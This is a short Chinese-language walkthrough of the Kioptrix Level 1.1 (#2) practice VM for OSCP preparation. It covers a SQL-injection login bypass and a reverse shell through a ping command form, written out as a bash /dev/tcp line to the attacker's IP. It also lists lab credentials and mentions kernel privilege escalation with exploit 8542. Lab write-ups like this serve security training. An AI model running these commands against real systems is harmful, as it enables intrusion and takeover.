oscp——Kioptrix: Level 1.1 (#2)

0x00 前言

第三十二台机子

0x01 信息收集

oscp——Kioptrix: Level 1.1 (#2)_第1张图片
oscp——Kioptrix: Level 1.1 (#2)_第2张图片

0x02 Web80-webshell

访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码
oscp——Kioptrix: Level 1.1 (#2)_第3张图片
成功进入后台,可以看到是一个执行ping命令的执行窗口
oscp——Kioptrix: Level 1.1 (#2)_第4张图片
这里反弹一下shell,这里使用

bash -i >& /dev/tcp/192.168.0.111/1234 >&1

oscp——Kioptrix: Level 1.1 (#2)_第5张图片

然后在/var/www/html目录下找到一个index文件,这里可以看道一个账号密码

"john", "hiroshima"

oscp——Kioptrix: Level 1.1 (#2)_第6张图片
这里是了一下su,但是没有成功,然后mysql连接一下,找到一个密码
oscp——Kioptrix: Level 1.1 (#2)_第7张图片

|    1 | admin    | 5afac8d85f |
|    2 | john     | 66lajGGbla |

0x03 webshell——rootshell

这里su 一下,但是发现密码还是错的,查一下内核版本
在这里插入图片描述
上网查了一下,可以用8542进行提权,编译一下,机子可能比较老。。。都没有放flag
oscp——Kioptrix: Level 1.1 (#2)_第8张图片

0x04 总结

这个机子没什么坑,难度也不大

你可能感兴趣的:(oscp)